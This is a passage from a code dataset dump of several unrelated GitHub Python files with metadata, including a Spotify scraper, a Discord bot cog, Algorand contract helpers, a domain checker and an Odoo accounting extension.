re.findall(user_expr, html):\n results[\"user\"].add(id)\n\n for slug, identifiers in results.items():\n for id in identifiers:\n page = slug + '/' + id\n pages.add(page)\n\n return pages, results\n elif code in status_messages.keys():\n message = status_messages[code]\n print(f\"{message} when accessing {url}. Retrying in 0.1 seconds...\")\n time.sleep(0.1)\n else:\n print(f\"Failed to access {url}. 
Status code: {code}\")\n return set(), dict()\n except KeyboardInterrupt:\n raise\n except Exception as e:\n print(f\"Error while scraping {url}: {str(e)}\")\n return set(), dict()\n \nasync def request(page, session):\n url = domain + page\n async with session.get(url) as response:\n html = await response.text()\n return process(url, html, response.status)\n \nasync def scrape(pages):\n connection = aiohttp.TCPConnector(limit = 64)\n\n async with ClientSession(connector = connection) as session:\n tasks = []\n\n for page in pages:\n task = asyncio.ensure_future(request(page, session))\n tasks.append(task)\n\n pbar = tqdm(total = len(pages), desc = \"Requesting URLs\", unit = \" tracks\", leave = False)\n outputs = []\n\n for output in asyncio.as_completed(tasks):\n try:\n value = await output\n\n if value is not None:\n outputs.append(value)\n except Exception as e:\n raise e\n continue\n finally:\n pbar.update(1)\n\n return outputs\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n os.makedirs(f\"{args.root}/queues/pages\", exist_ok = True)\n \n page_input_queue = pagequeue(f\"{args.root}/queues/pages/input.db\")\n page_output_queue = pagequeue(f\"{args.root}/queues/pages/output.db\")\n result_queue = diskqueue(f\"{args.root}/queues/results.db\")\n\n visited = diskset(f\"{args.root}/pages.db\")\n results = {key: diskset(f\"{args.root}/{key}.db\") for key in diskqueue.SLUG_MAPPING.keys()}\n\n if len(page_input_queue) == 0:\n page_input_queue.put(\"track/6fxbtIuYVYl37ynRqEfMcc\")\n\n last_time = time.time()\n round = 0\n \n batch_size = 4096\n\n while True:\n length = len(page_input_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n pages = page_input_queue.get_batch(min(batch_size, len(page_input_queue)))\n\n all_pages = []\n all_results = []\n\n for pages, outputs in asyncio.run(scrape(pages)):\n all_pages.extend(pages)\n\n for slug, identifiers in outputs.items():\n for id in identifiers:\n all_results.append((slug, id))\n\n page_output_queue.extend(all_pages)\n result_queue.extend(all_results)\n\n length = len(page_output_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n urls = page_output_queue.get_batch(min(batch_size, len(page_output_queue)))\n new_urls = []\n for url in urls:\n if url not in visited:\n new_urls.append(url)\n visited.extend(new_urls)\n page_input_queue.extend(new_urls)\n\n length = len(result_queue)\n for _ in tqdm(range(length // batch_size + 1)):\n slugs, hashes = result_queue.get_batch(min(batch_size, len(result_queue)))\n unique_items = defaultdict(set)\n for slug, hash in zip(slugs, hashes):\n if hash not in results[slug]:\n unique_items[slug].add(hash)\n for slug, identifiers in unique_items.items():\n results[slug].extend(identifiers)\n\n last_time = time.time()\n message = \", \".join(key + \": \" + str(len(results[key])) for key in diskqueue.SLUG_MAPPING.keys())\n print(f\"(Round #{round})\", message)\n print(len(page_input_queue), len(page_output_queue), len(result_queue))\n round += 1","repo_name":"ryanrudes/spotify","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15247962849","text":"\r\ndef executer_calcul(entrees):\r\n\tN=entrees[0]\r\n\tparties=entrees[1]\r\n\tCase=entrees[2]\r\n\tresult=''\r\n\twhile 
(sum(parties)>0):\r\n\t\tevac1=maximum(parties)\r\n\t\tparties[evac1]=parties[evac1]-1\r\n\t\tevac2=maximum(parties)\r\n\t\tif(2*parties[evac2]>sum(parties)):\r\n\t\t\tparties[evac2]=parties[evac2]-1\r\n\t\t\tresult=result+' '+chr(evac1+65)+chr(evac2+65)\r\n\t\telse:\r\n\t\t\tresult=result+' '+chr(evac1+65)\r\n\treturn result\r\n\r\ndef maximum(liste):\r\n\tmaximum=0\r\n\tfor i in range(len(liste)):\r\n\t\tif(liste[i]>liste[maximum]): maximum=i\r\n\treturn maximum\r\n\r\n# Main\r\nmultiprocessed=False # Decides whether to parallelize the computations to save time\r\nif (multiprocessed): from multiprocessing import Pool\r\nelse: output = open('Output.txt','w')\r\nif ((not multiprocessed) or __name__ == '__main__'):\r\n\twith open(\"Input.txt\", \"r\") as input:\r\n\t\tlines=input.readlines()\r\n\tT=int(lines[0])\r\n\tline=1\r\n\tCase=1\r\n\tcalculs=[]\r\n\twhile(line.json|.yaml)$', schema_view.without_ui(), name='schema_swagger'),\n\n    # Serving static media in Django to pipe it through LoginRequiredMiddleware\n    path(r'media/<path:path>', serve, {'document_root': settings.MEDIA_ROOT}),\n\n    # Admin\n    path(r'admin/', admin_site.urls),\n\n]\n\nif settings.WEBHOOKS_ENABLED:\n    _patterns += [\n        path(r'admin/webhook-backend-status/', include('django_rq.urls')),\n    ]\n\nif settings.DEBUG:\n    import debug_toolbar\n    _patterns += [\n        path(r'__debug__/', include(debug_toolbar.urls)),\n    ]\n\nif settings.METRICS_ENABLED:\n    _patterns += [\n        path('', include('django_prometheus.urls')),\n    ]\n\n# Prepend BASE_PATH\nurlpatterns = [\n    path(r'{}'.format(settings.BASE_PATH), include(_patterns))\n]\n\nhandler500 = 'utilities.views.server_error'\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/netbox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6406282642","text":"import discord\nfrom discord.ext import commands\n\nfrom manibot import Cog, command\n\n\ncolour_roles = {\n    302958707241648128: {\n        312126115273506817: 334811709053206540, # ron\n        146430655197216769: 304510376509177856, # kuka\n        214932117287600128: 312297405175562250 # hati\n    },\n    351755506341117954: {\n        174764205927432192: 351758043643510788 # scragly test role\n    }\n}\n\n\ndef has_colour_role(ctx):\n    gcr = colour_roles.get(ctx.guild.id)\n    if not gcr:\n        return False\n    mcr = gcr.get(ctx.author.id)\n    if mcr:\n        return True\n    return False\n\n\nclass RoleColours(Cog):\n\n    @command()\n    @commands.check(has_colour_role)\n    async def setcolour(self, ctx, colour: discord.Colour = None):\n        \"\"\"Allows you to adjust your unique colour role value.\n\n        Accepts the following colour hex formats:\n        0x<hex>, #<hex>, 0x#<hex>\n\n        Also accepts the following preset colours:\n        default, teal, dark_teal, green, dark_green, blue, dark_blue,\n        purple, dark_purple, magenta, dark_magenta, gold, dark_gold,\n        orange, dark_orange, red, dark_red, lighter_grey, dark_grey,\n        light_grey, darker_grey, blurple, greyple.\n        \"\"\"\n        if not colour:\n            return await ctx.embed(\n                ctx.author.top_role.colour,\n                colour=ctx.author.top_role.colour)\n\n        role = ctx.get.role(colour_roles[ctx.guild.id][ctx.author.id])\n\n        try:\n            await role.edit(colour=colour)\n        except discord.Forbidden:\n            is_hier = ctx.guild.me.top_role.position < role.position\n            if is_hier:\n                return await ctx.error(\n                    \"I don't have enough permission to edit that role.\",\n                    (\"Your colour role is positioned higher than my top \"\n                     \"role.\\nEither ensure my top role is positioned higher \"\n                     \"than it, or change the 
colour manually.\"))\n else:\n return await ctx.error(\n \"I don't have enough permission to edit that role.\")\n await ctx.success(f\"{role.name} role changed to colour: {colour}\")\n","repo_name":"scragly/Manibot","sub_path":"manibot/cogs/colours/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14904745842","text":"#!/usr/bin/env python\n\n'''\nConverts report files to CSV format.\n'''\n\n__author__ = 'Aditya Viswanathan'\n__email__ = 'aditya@adityaviswanathan.com'\n\nimport csv\nimport os\nimport xlrd\n\ndef xlsx_to_csv(path_name, file_name, ext, folder=''):\n wb = xlrd.open_workbook(path_name)\n # Below is a HACK that assumes the first sheet in the excel workbook\n # is the one that is to be processed.\n sheet = wb.sheet_by_index(0)\n csv_file = open((folder + '/' if folder else folder) +\n file_name + '.csv', 'w')\n csv_file_name = os.path.basename(csv_file.name)\n if os.path.isfile(csv_file.name):\n print('Overwriting existing CSV file ' + csv_file_name + '.');\n csv_writer = csv.writer(csv_file, quoting=csv.QUOTE_ALL)\n print('Converting {name}.{ext} to CSV via temp file {csv}'\n .format(name=file_name, ext=ext, csv=csv_file_name))\n for row_index in range(sheet.nrows):\n csv_writer.writerow(sheet.row_values(row_index))\n csv_file.close()\n return csv_file.name\n\ndef could_not_convert(path_name, file_name, ext, folder=''):\n raise Exception('Cannot convert file with extension {ext} to CSV'\n .format(ext=ext))\n\ndef to_csv(path, folder):\n name, ext = os.path.splitext(os.path.basename(path))\n if not os.path.exists(folder):\n os.makedirs(folder)\n switcher = {\n '.xlsx' : xlsx_to_csv\n }\n converter = switcher.get(ext, could_not_convert)\n return converter(path, name, ext, folder)\n","repo_name":"adityaviswanathan/dashboard","sub_path":"report_utils/to_csv.py","file_name":"to_csv.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71183404393","text":"import random as r\nimport time as t\n\noptions = {\n 1: {'name': 'Rock', 'image': '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''},\n 2: {'name': 'Paper', 'image': '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''},\n 3: {'name': 'Scissors', 'image': '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''}\n}\n\nclear_screen_command = '\\033[H\\033[J';\n\ndef playRockPaperScissors():\n print('''\n \n.---. .-. .---. .--. _ \n: .; : : :.-. : .; : : .--' :_; \n: .'.--. .--.: `'.' : _..--. .---. .--..--. `. `. .--..-..--. .--. .--..--. .--. \n: :.`' .; ' ..: . `. : : ' .; ;: .; ' '_.: ..' _`, ' ..: `._-.`._-.' 
.; : ..`._-.'\n:_;:_`.__.`.__.:_;:_; :_; `.__,_: ._.`.__.:_; `.__.`.__.:_`.__.`.__.`.__.:_; `.__.'\n : : \n :_; \n \n ''')\n \n print(\"First player to reach a score of 5 wins the game.\");\n\n user_score = 0;\n cpu_score = 0;\n round_count = 1;\n\n while user_score < 5 and cpu_score < 5:\n print(f\"\\nRound {round_count}\")\n print(f\"Scores:\\nUser: {user_score}\\tCPU: {cpu_score}\\n\")\n user_option = int(input(\"Choose:\\n1: Rock\\t2: Paper 3: Scissors\\n>> \"))\n cpu_option = r.randint(1, 3)\n user_choice = options[user_option]\n cpu_choice = options[cpu_option]\n\n print(\"User:\")\n print(user_choice['image'])\n t.sleep(1) # Add a delay of 1 second\n\n print(\"CPU:\")\n print(cpu_choice['image'])\n t.sleep(1) # Add a delay of 1 second\n\n if user_option == cpu_option:\n print(\"This was a draw!\\n\")\n elif (user_option == 1 and cpu_option == 3) or (user_option == 2 and cpu_option == 1) or (user_option == 3 and cpu_option == 2):\n print(f\"User won!\\n{user_choice['name']} beats {cpu_choice['name']} any day!\\n\")\n user_score += 1\n else:\n print(f\"CPU won!\\n{cpu_choice['name']} beats {user_choice['name']} any day!\\n\")\n cpu_score += 1\n\n round_count += 1\n print(\"-------------------------------------------------------------\");\n\n print(\"Final Scores:\")\n print(f\"User: {user_score}\\tCPU: {cpu_score}\\n\")\n\n if user_score > cpu_score:\n print(\"User wins the game!\")\n else:\n print(\"CPU wins the game!\")\n\n ans = input(\"Play again? (Y/N): \").lower()\n if ans == \"y\":\n print(clear_screen_command);\n playRockPaperScissors()\n\nplayRockPaperScissors()","repo_name":"Ehiane/100_days_of_code_in_python-Projects","sub_path":"RPS/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10922676874","text":"import logging\nimport os\nfrom pathlib import Path\n\nimport click\nimport sys\nimport datetime\nfrom random import randint\nfrom time import sleep\nfrom config import DOMAIN_EXTENSIONS, JSON_PATH, WORDS_PATH\nfrom helper import is_domain_name_available, add_to_json_file\n\n\n@click.command()\n@click.option('--start_index', default=0, help='Number of greetings.')\ndef main(start_index):\n \"\"\"\n Check the availability of domains in words.txt file using each of the DOMAIN_EXTENSIONS in the config.py file\n @param: start_index: Program will run from Xth word in word file to the end. 
Use when whoisquery server blocks\n you and crashes program\n \"\"\"\n # Create log directory\n os.makedirs(Path(__file__).parent / '../logs', exist_ok=True)\n # Configure logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n date = datetime.datetime.now().replace(microsecond=0)\n output_file_handler = logging.FileHandler(f\"logs/output-{date}.log\")\n stdout_handler = logging.StreamHandler(sys.stdout)\n logger.addHandler(output_file_handler)\n logger.addHandler(stdout_handler)\n # Read .txt file with words\n with open(WORDS_PATH, 'r') as f:\n words = [line.replace('\\n', '').lower() for line in f.readlines()]\n total_lines = len(words)\n current_count = start_index + 1\n # For every word in the file starting at the Xth word indicated by start_index,\n # check if domain is available given different DOMAIN_EXTENSIONS\n for word in words[start_index:]:\n domain_data = {word: []}\n for domain_extension in DOMAIN_EXTENSIONS:\n domain_name = f\"{word}{domain_extension}\"\n is_available = is_domain_name_available(domain_name, total_lines, current_count)\n if is_available:\n domain_data[word].append(domain_name)\n current_count += 1\n sleep(randint(5, 10))\n if len(domain_data[word]) != 0:\n add_to_json_file(JSON_PATH, domain_data)\n\n logger.info('Finished')\n\nif __name__ == '__main__':\n main()\n","repo_name":"pfournier1/DomainAvailabilityChecker","sub_path":"domain_availability_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34694115418","text":"\"\"\" from https://raw.githubusercontent.com/algorand/docs/master/examples/smart_contracts/v2/python/stateful_smart_contracts.py \"\"\"\n# TODO 0209: Fix local state read etc.\n# TODO 0209: Add new contract for stake.\n# TODO 0209: Dispense some asset for test accounts.\nimport base64\nfrom typing import Literal, TypedDict, overload\n\nfrom algosdk import account, mnemonic\nfrom algosdk.future import transaction\nfrom algosdk.v2client.algod import AlgodClient\n\nfrom artificial_algorand_contract.helper.external import open_algo_explorer\n\nfrom ..classes.algo_config import TestAccounts, algo_config\nfrom ..classes.algorand import AlgoAcc, TealNoOpArgs, TealPackage\nfrom .transaction_helper import get_default_params, wait_for_confirmation\n\n\n# helper function to compile program source\ndef compile_program(client: AlgodClient, source_code: str):\n return base64.b64decode(client.compile(source_code)[\"result\"])\n\n\n# create new application\ndef create_app(\n client: AlgodClient,\n private_key,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n):\n # define sender as creator\n sender = account.address_from_private_key(private_key)\n\n # declare on_complete as NoOp\n on_complete = transaction.OnComplete.NoOpOC.real\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationCreateTxn(\n sender,\n params,\n on_complete,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n )\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n app_id = transaction_response[\"application-index\"]\n print(\"Created new app-id: \", app_id)\n\n return app_id\n\n\n# 
opt-in to application\ndef opt_in_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n print(\"OptIn from account: \", sender)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationOptInTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"OptIn to app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# call application\ndef call_app(client: AlgodClient, private_key, index, app_args):\n # declare sender\n sender = account.address_from_private_key(private_key)\n print(\"Call from account: \", sender)\n\n params = get_default_params(client)\n # create unsigned transaction\n txn = transaction.ApplicationNoOpTxn(sender, params, index, app_args)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Called app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n if \"global-state-delta\" in transaction_response:\n print(\"Global State updated :\\n\", transaction_response[\"global-state-delta\"])\n if \"local-state-delta\" in transaction_response:\n print(\"Local State updated :\\n\", transaction_response[\"local-state-delta\"])\n\n\n# read user local state\ndef read_local_state(client: AlgodClient, addr, app_id):\n results = client.account_info(addr)\n\n local_state = results[\"apps-local-state\"]\n print(\n f\"local_state of account {addr} (showing all) for app_id {app_id}: \",\n local_state,\n # TODO: this key doesn't exist. Maybe old version? #pragma version 2\n )\n # for index in local_state:\n # if local_state[index] == app_id:\n # print(\n # f\"local_state of account {addr} for app_id {app_id}: \",\n # # local_state[\"key-value\"],\n # # TODO: this key doesn't exist. Maybe old version? 
#pragma version 2\n # )\n\n\n# read app global state\n# TODO: this and read local state should go to client helper (new file).\ndef read_global_state(client: AlgodClient, addr, app_id):\n results = client.account_info(addr)\n apps_created = results[\"created-apps\"]\n for app in apps_created:\n if app[\"id\"] == app_id:\n print(f\"global_state for app_id {app_id}: \", app[\"params\"][\"global-state\"])\n\n\n# update existing application\ndef update_app(\n client: AlgodClient, private_key, app_id, approval_program, clear_program\n):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n # # define initial value for key \"timestamp\"\n # app_args = [b'initial value']\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationUpdateTxn(\n sender, params, app_id, approval_program, clear_program\n ) # , app_args)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n app_id = transaction_response[\"txn\"][\"txn\"][\"apid\"]\n print(\"Updated existing app-id: \", app_id)\n\n\n# delete application\ndef delete_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationDeleteTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Deleted app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# close out from application\ndef close_out_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationCloseOutTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\"Closed out from app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"])\n\n\n# clear application\ndef clear_app(client: AlgodClient, private_key, index):\n # declare sender\n sender = account.address_from_private_key(private_key)\n\n params = get_default_params(client)\n\n # create unsigned transaction\n txn = transaction.ApplicationClearStateTxn(sender, params, index)\n\n # sign transaction\n signed_txn = txn.sign(private_key)\n tx_id = signed_txn.transaction.get_txid()\n\n # send transaction\n client.send_transactions([signed_txn])\n\n # await confirmation\n wait_for_confirmation(client, tx_id)\n\n # display results\n transaction_response = client.pending_transaction_info(tx_id)\n print(\n \"Cleared\", sender, \"from app-id: \", transaction_response[\"txn\"][\"txn\"][\"apid\"]\n )\n\n\ndef full_contract_test():\n from ..counter import counter_package # TODO: dynamic imports by 
name.\n\n algod_client = algo_config.client\n\n approval_program_source_initial = counter_package.approval\n approval_program_source_refactored = counter_package.approval\n clear_program_source = counter_package.clear\n\n # declare application state storage (immutable)\n local_ints = 0\n local_bytes = 0\n global_ints = 1\n global_bytes = 0\n global_schema = transaction.StateSchema(global_ints, global_bytes)\n local_schema = transaction.StateSchema(local_ints, local_bytes)\n\n # compile programs\n approval_program = compile_program(algod_client, approval_program_source_initial)\n clear_program = compile_program(algod_client, clear_program_source)\n\n # user declared account mnemonics\n creator_mnemonic = algo_config.accounts.admin.request_mnemonics()\n user_mnemonic = algo_config.accounts.bob.request_mnemonics()\n # define private keys\n creator_private_key = mnemonic.to_private_key(creator_mnemonic)\n user_private_key = mnemonic.to_private_key(user_mnemonic)\n\n # create new application\n app_id = create_app(\n algod_client,\n creator_private_key,\n approval_program,\n clear_program,\n global_schema,\n local_schema,\n )\n\n # opt-in to application\n opt_in_app(algod_client, user_private_key, app_id)\n\n # call application without arguments\n call_app(algod_client, user_private_key, app_id, None)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # read global state of application\n read_global_state(\n algod_client, account.address_from_private_key(creator_private_key), app_id\n )\n\n # update application\n approval_program = compile_program(algod_client, approval_program_source_refactored)\n update_app(\n algod_client, creator_private_key, app_id, approval_program, clear_program\n )\n\n # call application with arguments\n # now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n # app_args = [now.encode(\"utf-8\")]\n args = \"Add\"\n app_args = [args.encode(\"utf-8\")]\n call_app(algod_client, user_private_key, app_id, app_args)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # close-out from application\n close_out_app(algod_client, user_private_key, app_id)\n\n # opt-in again to application\n opt_in_app(algod_client, user_private_key, app_id)\n\n # call application with arguments\n call_app(algod_client, user_private_key, app_id, app_args)\n\n # read local state of application from user account\n read_local_state(\n algod_client, account.address_from_private_key(user_private_key), app_id\n )\n\n # delete application\n delete_app(algod_client, creator_private_key, app_id)\n\n # clear application from user account\n clear_app(algod_client, user_private_key, app_id)\n\n\ndef test_clean_up(app_id: int):\n algod_client = algo_config.client\n creator_mnemonic = algo_config.accounts.admin.request_mnemonics()\n creator_private_key = mnemonic.to_private_key(creator_mnemonic)\n delete_app(algod_client, creator_private_key, app_id)\n","repo_name":"Artcoin-Network/artificix-algorand-contract","sub_path":"artificial_algorand_contract/helper/contract_helper.py","file_name":"contract_helper.py","file_ext":"py","file_size_in_byte":11298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71428623913","text":"#!/usr/bin/env python3\nimport sys\n\nfiles = sys.argv[1:]\n\noutlines = list()\n# COLLECT INPUTS\nfor file in 
files:\n\twith open(file, 'r') as fh:\n\t\toutlines.extend(fh.readlines())\n\n# WRITE OUT TO GROUP\nfor line in outlines:\n\tsys.stdout.write(line)","repo_name":"kmayerb/nf-templates","sub_path":"collect_groups_of_files/bin/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37737374470","text":"from step0_Doc3D_obj import Doc3D\n\nclass Kong_Doc3D(Doc3D):\n    def __init__(self, root, use_sep_name=True):\n        super(Kong_Doc3D, self).__init__(root)\n        self.db_base_name_dir_string = self.db_root + \"/0_dis_img/%02i\" ### overwrite parent class\n        # self.db_base_name_dir_string = self.db_root + \"/2_wc-4_W_w_M_npy/%02i\" ### overwrite parent class; an incomplete Kong_Doc3D may need this, e.g. when a 500GB SSD is too small and can only hold an incomplete Kong_Doc3D\n\n        self.use_sep_name = use_sep_name\n\n        self._dis_img_paths = None\n        self._rec_hope_paths = None\n        self._uv_npy_paths = None\n        self._uv_visual_paths = None\n        self._uv_knpy_paths = None\n        self._wc_npy_paths = None\n        self._wc_2D_visual_paths = None\n        self._wc_3D_visual_paths = None\n        self._W_w_M_npy_paths = None\n        self._W_w_M_knpy_paths = None\n\n    @property\n    def dis_img_paths(self):\n        if(self._dis_img_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._dis_img_paths\n\n    @property\n    def rec_hope_paths(self):\n        if(self._rec_hope_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._rec_hope_paths\n\n    @property\n    def uv_npy_paths(self):\n        if(self._uv_npy_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._uv_npy_paths\n\n    @property\n    def uv_visual_paths(self):\n        if(self._uv_visual_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._uv_visual_paths\n\n    @property\n    def uv_knpy_paths(self):\n        if(self._uv_knpy_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._uv_knpy_paths\n\n    @property\n    def wc_npy_paths(self):\n        if(self._wc_npy_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._wc_npy_paths\n\n    @property\n    def wc_2D_visual_paths(self):\n        if(self._wc_2D_visual_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._wc_2D_visual_paths\n\n    @property\n    def wc_3D_visual_paths(self):\n        if(self._wc_3D_visual_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._wc_3D_visual_paths\n\n    @property\n    def W_w_M_npy_paths(self):\n        if(self._W_w_M_npy_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._W_w_M_npy_paths\n\n    @property\n    def W_w_M_knpy_paths(self):\n        if(self._W_w_M_knpy_paths is None): self.get_doc3d_kinds_of_paths()\n        return self._W_w_M_knpy_paths\n\n    def get_doc3d_kinds_of_paths(self): ### overwrite parent class\n        print(\"get_doc3d_kinds_of_paths( here~~~~~ should just be used only once! (should only be used once)\")\n        self._get_base_name() ### reuse parent class\n\n        self._dis_img_paths = []\n        self._rec_hope_paths = []\n        self._uv_npy_paths = []\n        self._uv_visual_paths = []\n        self._uv_knpy_paths = []\n        self._wc_npy_paths = []\n        self._wc_2D_visual_paths = []\n        self._wc_3D_visual_paths = []\n        self._W_w_M_npy_paths = []\n        self._W_w_M_knpy_paths = []\n\n        ### check whether sep_name is used\n        if(self.use_sep_name is True): use_what_names = self.page_names_w_dir_combine_sep\n        else: use_what_names = self.page_names_w_dir_combine\n\n        for use_what_name in use_what_names: ### reuse parent class\n            self._dis_img_paths .append(self.db_root + \"/0_dis_img/\" + use_what_name + \".png\" )\n            self._rec_hope_paths .append(self.db_root + \"/0_rec_hope/\" + use_what_name + \".png\" )\n            self._uv_npy_paths .append(self.db_root + \"/1_uv-1_npy/\" + use_what_name + 
\".npy\" )\n self._uv_visual_paths .append(self.db_root + \"/1_uv-2_visual/\" + use_what_name + \".jpg\" )\n self._uv_knpy_paths .append(self.db_root + \"/1_uv-3_knpy/\" + use_what_name + \".knpy\" )\n self._wc_npy_paths .append(self.db_root + \"/2_wc-1_npy/\" + use_what_name + \".npy\" )\n self._wc_2D_visual_paths .append(self.db_root + \"/2_wc-2_2D_visual/\" + use_what_name + \".jpg\" )\n self._wc_3D_visual_paths .append(self.db_root + \"/2_wc-3_3D_visual/\" + use_what_name + \".jpg\" )\n self._W_w_M_npy_paths .append(self.db_root + \"/2_wc-4_W_w_M_npy/\" + use_what_name + \".npy\" )\n self._W_w_M_knpy_paths .append(self.db_root + \"/2_wc-5_W_w_M_knpy/\" + use_what_name + \".knpy\" )\n\nkong_doc3D = Kong_Doc3D(root=r\"E:\\data_dir\\datasets\\type8_blender\\kong_doc3d\\train\") ### 127.23 2022/04/11\n\nif(__name__ == \"__main__\"):\n print(\"dis_img_paths :\", kong_doc3D.dis_img_paths[0])\n print(\"rec_hope_paths :\", kong_doc3D.rec_hope_paths[0])\n print(\"uv_npy_paths :\", kong_doc3D.uv_npy_paths[0])\n print(\"uv_visual_paths :\", kong_doc3D.uv_visual_paths[0])\n print(\"uv_knpy_paths :\", kong_doc3D.uv_knpy_paths[0])\n print(\"wc_npy_paths :\", kong_doc3D.wc_npy_paths[0])\n print(\"wc_2D_visual_paths :\", kong_doc3D.wc_2D_visual_paths[0])\n print(\"wc_3D_visual_paths :\", kong_doc3D.wc_3D_visual_paths[0])\n print(\"W_w_M_npy_paths :\", kong_doc3D.W_w_M_npy_paths[0])\n print(\"W_w_M_knpy_paths :\", kong_doc3D.W_w_M_knpy_paths[0])\n","repo_name":"KongBOy/kong_Doc3D","sub_path":"step0_Kong_Doc3D.py","file_name":"step0_Kong_Doc3D.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24018904309","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass AccountMove(models.Model):\n _name = 'account.move'\n _inherit = ['account.move', 'utm.mixin']\n\n\n id_theos = fields.Char('Theos ID')\n\n\n def unlink(self):\n downpayment_lines = self.mapped('line_ids.balcon_line_ids').filtered(lambda line: line.is_downpayment and line.invoice_lines <= self.mapped('line_ids'))\n res = super(AccountMove, self).unlink()\n if downpayment_lines:\n downpayment_lines.unlink()\n return res\n\n @api.onchange('partner_id')\n def _onchange_partner_id(self):\n res = super(AccountMove, self)._onchange_partner_id()\n return res\n\n\n def _reverse_moves(self, default_values_list=None, cancel=False):\n # OVERRIDE\n if not default_values_list:\n default_values_list = [{} for move in self]\n\n return super()._reverse_moves(default_values_list=default_values_list, cancel=cancel)\n\n def action_post(self):\n #inherit of the function from account.move to validate a new tax and the priceunit of a downpayment\n res = super(AccountMove, self).action_post()\n line_ids = 